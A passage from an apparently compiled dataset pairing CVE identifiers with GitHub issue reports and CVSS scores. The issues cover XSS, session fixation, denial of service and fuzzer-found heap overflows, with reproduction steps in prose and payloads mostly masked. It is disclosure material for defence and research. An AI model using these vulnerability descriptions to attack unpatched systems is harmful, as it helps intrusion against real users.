  61133. "Issue_Created_At": "2019-12-25T08:12:19Z",
  61134. "description": "HTML injection via unescaped attachment filename. I investigated the error condition found in the property based unit test URLTAG with RNG state NUMBERTAG b8f0d4ec2a NUMBERTAG b5 URLTAG for the APITAG class in an unrelated change. The error occurs in the APITAG method, where we can provide a string that will have the filename inserted in place of any APITAG in that string and which then becomes the text node of the link to download the attachment. The error condition that jsverify found was when it generated a prefix APITAG for that label (so the label generated in that test case became APITAG ). Since we insert that label untouched, it attempts to insert another link into the text node of a link, which isn't allowed in HTML and in the jsdom based environment gets silently ignored. Hence the test failed only for APITAG tags, as other tags are allowed inside a link. While the label itself is from a trusted source (hardcoded in the translation files and APITAG the filename that is injected isn't. If one were to create a paste with an attachment whose name contains HTML code (which can easily be done using one of the CLI clients), that paste would have that snippet injected when the paste is displayed. I have prepared a patch and an updated unit test case that applies HTML entity encoding to address this and will push this ASAP. While file uploads are disabled by default, I would still suggest that we publish a release with this fix. Your opinions?",
  61135. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
  61136. "severity": "MEDIUM",
  61137. "baseScore": 4.4,
  61138. "impactScore": 2.7,
  61139. "exploitabilityScore": 1.3
  61140. },
  61141. {
  61142. "CVE_ID": "CVE-2020-5234",
  61143. "Issue_Url_old": "https://github.com/neuecc/MessagePack-CSharp/issues/810",
  61144. "Issue_Url_new": "https://github.com/neuecc/messagepack-csharp/issues/810",
  61145. "Repo_new": "neuecc/messagepack-csharp",
  61146. "Issue_Created_At": "2020-02-07T23:25:01Z",
  61147. "description": "APITAG returns null on copied instances. When a APITAG instance is mutated, the copy constructor doesn't initialize its APITAG field, leading to future calls to APITAG to return null. What's particularly hazardous about this is that null is interpreted by APITAG to mean \"default comparer\" so it defeats the hash collision resistant fixes we made recently.",
  61148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  61149. "severity": "MEDIUM",
  61150. "baseScore": 6.5,
  61151. "impactScore": 3.6,
  61152. "exploitabilityScore": 2.8
  61153. },
  61154. {
  61155. "CVE_ID": "CVE-2020-5234",
  61156. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/405",
  61157. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/405",
  61158. "Repo_new": "aspnet/announcements",
  61159. "Issue_Created_At": "2020-01-31T17:10:21Z",
  61160. "description": "Microsoft Security Advisory | APITAG Denial of Service. Microsoft Security Advisory | APITAG Denial of Service APITAG APITAG Executive summary This advisory is being published in response to a recent security advisory for the APITAG APITAG package URLTAG . Since ASP.NET Core APITAG users may be using this package, we want to bring this issue to the attention of all ASP.NET Core users. Microsoft is releasing this security advisory to provide information about a vulnerability that affects ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when using the APITAG URLTAG APITAG package. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how APITAG handles deserialization. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you are exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG with the APITAG Hub Protocol. 
APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG With code change described below APITAG NUMBERTAG Update transitive reference to APITAG NOTE: APITAG NUMBERTAG is not compatible with ASP.NET Core APITAG APITAG APITAG How do I fix the issue? First examine the packages you have installed. If you have a vulnerable version of APITAG in your package graph, you must update it. If you have a reference to APITAG in your project, you likely have a vulnerable version of APITAG and should fix it by directly referencing a secure version fixing transitive dependencies . In addition to updating you must set the APITAG static property to enable the ERRORTAG mode for the APITAG serializer, to ensure you are protected. See the APITAG advisory URLTAG for details. Add the following code to the top of your app's entry point: ERRORTAG If your application provides any custom APITAG implementations, you should also update them to include the relevant security measures by ensuring reads of variable length values (such as strings) are done within a APITAG block. See the APITAG advisory URLTAG for more details. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. 
Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. 
Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: v Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. 
You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. 
Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Levi Broderick and Andrew Arnott of Microsoft Corporation External Links Security Advisory from the APITAG package authors URLTAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  61161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  61162. "severity": "MEDIUM",
  61163. "baseScore": 6.5,
  61164. "impactScore": 3.6,
  61165. "exploitabilityScore": 2.8
  61166. },
  61167. {
  61168. "CVE_ID": "CVE-2020-5239",
  61169. "Issue_Url_old": "https://github.com/Mailu/Mailu/issues/1354",
  61170. "Issue_Url_new": "https://github.com/mailu/mailu/issues/1354",
  61171. "Repo_new": "mailu/mailu",
  61172. "Issue_Created_At": "2020-02-08T09:30:20Z",
  61173. "description": "WARNING Fetchmail security update to all branches, update ASAP. On NUMBERTAG we discovered a bug in the Fetchmail script for Mailu that has serious security consequences. If you are using the fetchmail container for Mailu (which is optional), please apply the following instructions as soon as possible. If you know any Mailu administrator, please spread the word. Instructions NUMBERTAG Before anything else, make sure that you can access your container logs, and create a backup if you are using the default logging driver, as update may overwrite these logs and make post analysis more difficult NUMBERTAG Then apply one of the following mitigations. A. If running on NUMBERTAG or master, update the fetchmail container : docker compose pull fetchmail; docker compose up d B. If running on another version, upgrade at least to NUMBERTAG if possible to NUMBERTAG C. In case you need time before updating the container or upgrading Mailu, disable the fetchmail service : docker compose stop fetchmail (then comment out the fetchmail section from the compose file to avoid any later mistake NUMBERTAG If you suspect any exploitation might have taken place, bring down Mailu, modify the APITAG with a new NUMBERTAG bytes random value, then bring Mailu back up. Change your password for every fetched account configured on your Mailu instance NUMBERTAG Inspect your logs and database for any application tokens that might be illegitimate or recently modified accounts that could indicate an illegitimate password change (which could both be consequences of a successful exploit). Take action accordingly, and feel free to ask any question on the discussion thread. Timeline NUMBERTAG Vulnerability reported and confirmed NUMBERTAG patch published to branches NUMBERTAG to master, advisory published Details The vulnerability requires authenticated access for exploitation, so patching is even more urgent if you have open registrations or untrusted users on your Mailu server. 
We will update this post in the next few days with details about the discovery, analysis and fix for this vulnerability. We will possibly request a CVE identifier for this, given the serious impact, so that visibility is maximum and Mailu administrators upgrade quickly. The current estimated CVSS is over NUMBERTAG We will also provide plausible exploitation markers (additional to instructions in steps NUMBERTAG although we did not find anything suspicious on any of three Mailu instances we manage that have open registration.",
  61174. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61175. "severity": "HIGH",
  61176. "baseScore": 8.8,
  61177. "impactScore": 5.9,
  61178. "exploitabilityScore": 2.8
  61179. },
  61180. {
  61181. "CVE_ID": "CVE-2020-5283",
  61182. "Issue_Url_old": "https://github.com/viewvc/viewvc/issues/211",
  61183. "Issue_Url_new": "https://github.com/viewvc/viewvc/issues/211",
  61184. "Repo_new": "viewvc/viewvc",
  61185. "Issue_Created_At": "2020-03-26T18:08:02Z",
  61186. "description": "XSS vulnerability: CVS lastlog filename not escaped. Describe the bug When the APITAG option is enabled, APITAG shows for directories in the directory view the log message of the most recently modified child thereof, along with the child file's name and revision number. Unfortunately, the child file's name is not properly HTML escaped. Steps to reproduce the behavior NUMBERTAG In a CVS repository, copy the APITAG backing file for any non dead versioned file into an otherwise empty subdirectory of the repository. ERRORTAG NUMBERTAG Ensure that APITAG is enabled in your APITAG file (restarting any relevant servers NUMBERTAG In APITAG visit the parent directory of the newly created file. APITAG will pass the name of your newly created file (minus the APITAG bit) to the browser without escaping that name for safe HTML transport. In this specific example, a APITAG alert dialog will appear with the message NUMBERTAG Expected behavior APITAG should relay the name of the last modified file, properly escaped.",
  61187. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
  61188. "severity": "LOW",
  61189. "baseScore": 3.5,
  61190. "impactScore": 2.5,
  61191. "exploitabilityScore": 0.9
  61192. },
  61193. {
  61194. "CVE_ID": "CVE-2020-5290",
  61195. "Issue_Url_old": "https://github.com/redpwn/rctf/issues/147",
  61196. "Issue_Url_new": "https://github.com/redpwn/rctf/issues/147",
  61197. "Repo_new": "redpwn/rctf",
  61198. "Issue_Created_At": "2020-03-29T07:04:38Z",
  61199. "description": "Session fixation vulnerability in /verify. Description There is a session fixation vulnerability in rCTF exploitable through the APITAG hash when making a request to the APITAG endpoint. Vulnerable code ERRORTAG Exploitation Scenario An attacker team could potentially steal flags by, for example, exploiting a stored XSS payload in a CTF challenge so that victim teams who solve the challenge are unknowingly (and against their will) signed into the attacker team's account. Then, the attacker can gain points / value off the backs of the victims. Reproduction Steps NUMBERTAG Create two teams: an attacker, and a victim. Sign into the victim's account NUMBERTAG Make an HTTP request to APITAG where APITAG is the attacker's team code NUMBERTAG Observe that you have been logged in as the attacker. Extra Details Commit that introduced the vulnerability URLTAG Potential solutions Instead of having the verification email link immediately sign users in, have it be purely for confirmation purposes. After opening the verification link and verifying the email address, the original registration page which is polling the server for updates would receive word that the email is verified. It would then log in without requiring a session ID from user input.",
  61200. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  61201. "severity": "MEDIUM",
  61202. "baseScore": 6.5,
  61203. "impactScore": 3.6,
  61204. "exploitabilityScore": 2.8
  61205. },
  61206. {
  61207. "CVE_ID": "CVE-2020-5303",
  61208. "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/1696",
  61209. "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/1696",
  61210. "Repo_new": "tendermint/tendermint",
  61211. "Issue_Created_At": "2018-06-06T09:48:53Z",
  61212. "description": "Bounding resource usage in Tendermint. General idea is overall understanding and control of resources used for processing of every kind of message. This is the preliminary thoughts based on discussions with MENTIONTAG RPC: public APIs, submit part. No limit on data length. We need to have limit on request size. We want to constrain number of open connections. Connections can be one shot (http) or persistent (websocket). For persistent connections, we want to limit number of outstanding requests in a period of time. If client submits over broadcast_commit then it is necessary in addition to constrain number of outstanding requests as each request requires creating request context so consumes resources. public APIs, query part. Rate limit number of calls for every endpoint. Bound response size. public APIs, subscribe. Bound number of open subscriptions. Peer connection management: persistent connections to k peers. We bound APITAG We don't accept more connections than this number. There is also a bound on number of outgoing connections. For each connection we want to constrain resources used per message type and put limit on message size. Question: Do we want to have global contract on resource usage, i.e., what part of available bandwidth will be used for Mempool messages, how much for consensus, fast sync, etc. The follow up question is how we can enforce this. Is this static setup or it should be adapted based on node state and the state of its peers. Question: Do we want to have separate connections for sending and receiving of messages? CPU: We want to know number of go routines and correlation with number of peers and number of client connections and subscriptions. Number of go routines should be bounded. Performance analysis of Tendermint should be done. We want to understand number and usage of routines, and what are the bottlenecks. Memory: Memory usage should be bounded and consistent. Profiling of memory usage is needed. 
Correlation with number of peers and number of client connections and subscriptions should be determined. Disk usage: We want to place constraint on reading/writing to disk.",
  61213. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61214. "severity": "LOW",
  61215. "baseScore": 3.7,
  61216. "impactScore": 1.4,
  61217. "exploitabilityScore": 2.2
  61218. },
  61219. {
  61220. "CVE_ID": "CVE-2020-5303",
  61221. "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/3338",
  61222. "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/3338",
  61223. "Repo_new": "tendermint/tendermint",
  61224. "Issue_Created_At": "2019-02-20T15:10:34Z",
  61225. "description": "p2p: sent next PEX request too soon. Some users are reporting seeing this error, potentially when talking to seeds. Properly functioning nodes should rate limit how often they send pex requests so they don't send them too frequently. It seems something about this logic is off. An example of this happening was reported in NUMBERTAG though it seems that issue is about a different problem.",
  61226. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61227. "severity": "LOW",
  61228. "baseScore": 3.7,
  61229. "impactScore": 1.4,
  61230. "exploitabilityScore": 2.2
  61231. },
  61232. {
  61233. "CVE_ID": "CVE-2020-5395",
  61234. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/4084",
  61235. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/4084",
  61236. "Repo_new": "fontforge/fontforge",
  61237. "Issue_Created_At": "2020-01-03T16:46:57Z",
  61238. "description": "Use after free (heap) in the APITAG function. Hi, While fuzzing APITAG with AFL, I found a heap use after free in the APITAG function, in sfd.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced in APITAG NUMBERTAG and with latest Git master by running: APITAG ERRORTAG",
  61239. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61240. "severity": "HIGH",
  61241. "baseScore": 8.8,
  61242. "impactScore": 5.9,
  61243. "exploitabilityScore": 2.8
  61244. },
  61245. {
  61246. "CVE_ID": "CVE-2020-5496",
  61247. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/4085",
  61248. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/4085",
  61249. "Repo_new": "fontforge/fontforge",
  61250. "Issue_Created_At": "2020-01-03T21:15:18Z",
  61251. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing APITAG with AFL, I found a heap based buffer overflow in the APITAG function, in splinesave.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced in APITAG NUMBERTAG and with latest Git master by running: APITAG ERRORTAG",
  61252. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61253. "severity": "HIGH",
  61254. "baseScore": 8.8,
  61255. "impactScore": 5.9,
  61256. "exploitabilityScore": 2.8
  61257. },
  61258. {
  61259. "CVE_ID": "CVE-2020-5497",
  61260. "Issue_Url_old": "https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521",
  61261. "Issue_Url_new": "https://github.com/mitreid-connect/openid-connect-java-spring-server/issues/1521",
  61262. "Repo_new": "mitreid-connect/openid-connect-java-spring-server",
  61263. "Issue_Created_At": "2020-01-03T18:59:15Z",
  61264. "description": "Cross Site Scripting APITAG APITAG appears to be vulnerable to XSS here: ~~~ // get the info of the current user, if available (null otherwise) function APITAG { return APITAG } ~~~ APITAG is included in the page and is not encoded so malicious elements could be created. If the string APITAG appears in APITAG , the APITAG element will be closed and a new malicious APITAG can be created: ~~~ // get the info of the current user, if available (null otherwise) function APITAG { return APITAG APITAG APITAG alert NUMBERTAG APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG APITAG EMAILTAG \",\"email_verified\":true}; } ~~~ FILETAG And the malicious APITAG is executed: FILETAG",
  61265. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61266. "severity": "MEDIUM",
  61267. "baseScore": 6.1,
  61268. "impactScore": 2.7,
  61269. "exploitabilityScore": 2.8
  61270. },
  61271. {
  61272. "CVE_ID": "CVE-2020-6173",
  61273. "Issue_Url_old": "https://github.com/theupdateframework/tuf/issues/973",
  61274. "Issue_Url_new": "https://github.com/theupdateframework/python-tuf/issues/973",
  61275. "Repo_new": "theupdateframework/python-tuf",
  61276. "Issue_Created_At": "2020-01-08T17:09:34Z",
  61277. "description": "Potential APITAG for attacker that can create metadata files.... We received the report below about an attacker that can create many invalid signatures on a metadata file, delaying the moment when the client will determine the signature is not valid. This delay may be for at least a few minutes, but possibly could be longer especially if multiple files are impacted. Possible remediations include failing earlier (possibly immediately) if any signature is not valid. Credit to Erik Maclean Analog Devices, Inc. for reporting this issue. APITAG Details below.) Tracking ID: CVETAG Summary: Potential Client side Denial of Service Description: While maximum file size is restricted for downloading, the client may attempt to validate a large number of signatures. We have been able to add over NUMBERTAG copies of the same invalid signature into the APITAG file, which results in the client attempting to validate each one, spending several minutes on validation. The file size limit of APITAG is larger and may allow up to NUMBERTAG signatures, further increasing the amount of time spent in validation. Security Impact: Denial of Service Affected Version: Identified at commit APITAG suspect all versions. Credit: Erik Maclean Analog Devices, Inc.",
  61278. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  61279. "severity": "MEDIUM",
  61280. "baseScore": 5.3,
  61281. "impactScore": 1.4,
  61282. "exploitabilityScore": 3.9
  61283. },
  61284. {
  61285. "CVE_ID": "CVE-2020-6609",
  61286. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/179",
  61287. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/179",
  61288. "Repo_new": "libredwg/libredwg",
  61289. "Issue_Created_At": "2020-01-03T03:19:25Z",
  61290. "description": "Sever. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 APITAG NUMBERTAG heap buffer overflow in read_pages_map PATHTAG POC: URLTAG ASAN says: ERRORTAG",
  61291. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61292. "severity": "HIGH",
  61293. "baseScore": 8.8,
  61294. "impactScore": 5.9,
  61295. "exploitabilityScore": 2.8
  61296. },
  61297. {
  61298. "CVE_ID": "CVE-2020-6617",
  61299. "Issue_Url_old": "https://github.com/nothings/stb/issues/864",
  61300. "Issue_Url_new": "https://github.com/nothings/stb/issues/864",
  61301. "Repo_new": "nothings/stb",
  61302. "Issue_Created_At": "2020-01-06T11:18:26Z",
  61303. "description": "assertion failure in stbtt__cff_int in stb_truetype.h. assertion failure in APITAG can be triggered by user supplied font file. APITAG poc: FILETAG result: ERRORTAG",
  61304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61305. "severity": "HIGH",
  61306. "baseScore": 8.8,
  61307. "impactScore": 5.9,
  61308. "exploitabilityScore": 2.8
  61309. },
  61310. {
  61311. "CVE_ID": "CVE-2020-6618",
  61312. "Issue_Url_old": "https://github.com/nothings/stb/issues/866",
  61313. "Issue_Url_new": "https://github.com/nothings/stb/issues/866",
  61314. "Repo_new": "nothings/stb",
  61315. "Issue_Created_At": "2020-01-06T11:24:48Z",
  61316. "description": "heap overflow in stbtt__find_table in stb_truetype.h. heap overflow in line NUMBERTAG APITAG doesn't check any out of bound access, so heap overflow can be triggered here. APITAG poc: FILETAG result: ERRORTAG",
  61317. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61318. "severity": "HIGH",
  61319. "baseScore": 8.8,
  61320. "impactScore": 5.9,
  61321. "exploitabilityScore": 2.8
  61322. },
  61323. {
  61324. "CVE_ID": "CVE-2020-6619",
  61325. "Issue_Url_old": "https://github.com/nothings/stb/issues/863",
  61326. "Issue_Url_new": "https://github.com/nothings/stb/issues/863",
  61327. "Repo_new": "nothings/stb",
  61328. "Issue_Created_At": "2020-01-06T11:15:45Z",
  61329. "description": "assertion failure in stbtt__buf_seek in stb_truetype.h. assertion failure in APITAG can be triggered by user supplied font file. APITAG poc: FILETAG result: ERRORTAG",
  61330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61331. "severity": "HIGH",
  61332. "baseScore": 8.8,
  61333. "impactScore": 5.9,
  61334. "exploitabilityScore": 2.8
  61335. },
  61336. {
  61337. "CVE_ID": "CVE-2020-6620",
  61338. "Issue_Url_old": "https://github.com/nothings/stb/issues/868",
  61339. "Issue_Url_new": "https://github.com/nothings/stb/issues/868",
  61340. "Repo_new": "nothings/stb",
  61341. "Issue_Created_At": "2020-01-06T11:29:19Z",
  61342. "description": "heap overflow in stbtt__buf_get8 in stb_truetype.h . APITAG has heap overflow vulnerability. APITAG poc: FILETAG result: ERRORTAG",
  61343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61344. "severity": "HIGH",
  61345. "baseScore": 8.8,
  61346. "impactScore": 5.9,
  61347. "exploitabilityScore": 2.8
  61348. },
  61349. {
  61350. "CVE_ID": "CVE-2020-6621",
  61351. "Issue_Url_old": "https://github.com/nothings/stb/issues/867",
  61352. "Issue_Url_new": "https://github.com/nothings/stb/issues/867",
  61353. "Repo_new": "nothings/stb",
  61354. "Issue_Created_At": "2020-01-06T11:27:04Z",
  61355. "description": "heap overflow in APITAG in stb_truetype.h. APITAG doesn't have any bounds check, so a heap overflow can be triggered. APITAG APITAG poc: FILETAG result: ERRORTAG",
  61356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61357. "severity": "HIGH",
  61358. "baseScore": 8.8,
  61359. "impactScore": 5.9,
  61360. "exploitabilityScore": 2.8
  61361. },
  61362. {
  61363. "CVE_ID": "CVE-2020-6622",
  61364. "Issue_Url_old": "https://github.com/nothings/stb/issues/869",
  61365. "Issue_Url_new": "https://github.com/nothings/stb/issues/869",
  61366. "Repo_new": "nothings/stb",
  61367. "Issue_Created_At": "2020-01-06T11:31:13Z",
  61368. "description": "heap overflow in stbtt__buf_peek8 in stb_truetype.h . heap overflow in APITAG . APITAG poc: FILETAG result: ERRORTAG",
  61369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61370. "severity": "HIGH",
  61371. "baseScore": 8.8,
  61372. "impactScore": 5.9,
  61373. "exploitabilityScore": 2.8
  61374. },
  61375. {
  61376. "CVE_ID": "CVE-2020-6623",
  61377. "Issue_Url_old": "https://github.com/nothings/stb/issues/865",
  61378. "Issue_Url_new": "https://github.com/nothings/stb/issues/865",
  61379. "Repo_new": "nothings/stb",
  61380. "Issue_Created_At": "2020-01-06T11:20:15Z",
  61381. "description": "assertion failure in stbtt__cff_get_index in stb_truetype.h. assertion failure in stbtt__cff_get_index can be triggered by user supplied file. APITAG poc: FILETAG result: ERRORTAG",
  61382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61383. "severity": "HIGH",
  61384. "baseScore": 8.8,
  61385. "impactScore": 5.9,
  61386. "exploitabilityScore": 2.8
  61387. },
  61388. {
  61389. "CVE_ID": "CVE-2020-6628",
  61390. "Issue_Url_old": "https://github.com/libming/libming/issues/191",
  61391. "Issue_Url_new": "https://github.com/libming/libming/issues/191",
  61392. "Repo_new": "libming/libming",
  61393. "Issue_Created_At": "2020-01-07T01:51:41Z",
  61394. "description": "heap overflow in decompile_SWITCH. export APITAG ./swftopython $poc FILETAG asan output ERRORTAG",
  61395. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61396. "severity": "HIGH",
  61397. "baseScore": 8.8,
  61398. "impactScore": 5.9,
  61399. "exploitabilityScore": 2.8
  61400. },
  61401. {
  61402. "CVE_ID": "CVE-2020-6629",
  61403. "Issue_Url_old": "https://github.com/libming/libming/issues/190",
  61404. "Issue_Url_new": "https://github.com/libming/libming/issues/190",
  61405. "Repo_new": "libming/libming",
  61406. "Issue_Created_At": "2020-01-07T00:53:16Z",
  61407. "description": "null pointer reference in APITAG swftophp $poc FILETAG asan output ERRORTAG",
  61408. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61409. "severity": "MEDIUM",
  61410. "baseScore": 6.5,
  61411. "impactScore": 3.6,
  61412. "exploitabilityScore": 2.8
  61413. },
  61414. {
  61415. "CVE_ID": "CVE-2020-6630",
  61416. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1377",
  61417. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1377",
  61418. "Repo_new": "gpac/gpac",
  61419. "Issue_Created_At": "2020-01-02T00:45:04Z",
  61420. "description": "null pointer reference in gf_isom_get_media_data_size. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG asan output ERRORTAG",
  61421. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61422. "severity": "MEDIUM",
  61423. "baseScore": 5.5,
  61424. "impactScore": 3.6,
  61425. "exploitabilityScore": 1.8
  61426. },
  61427. {
  61428. "CVE_ID": "CVE-2020-6631",
  61429. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1378",
  61430. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1378",
  61431. "Repo_new": "gpac/gpac",
  61432. "Issue_Created_At": "2020-01-02T00:49:55Z",
  61433. "description": "null pointer reference in gf_m2ts_stream_process_pmt. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG asan output ERRORTAG",
  61434. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61435. "severity": "MEDIUM",
  61436. "baseScore": 5.5,
  61437. "impactScore": 3.6,
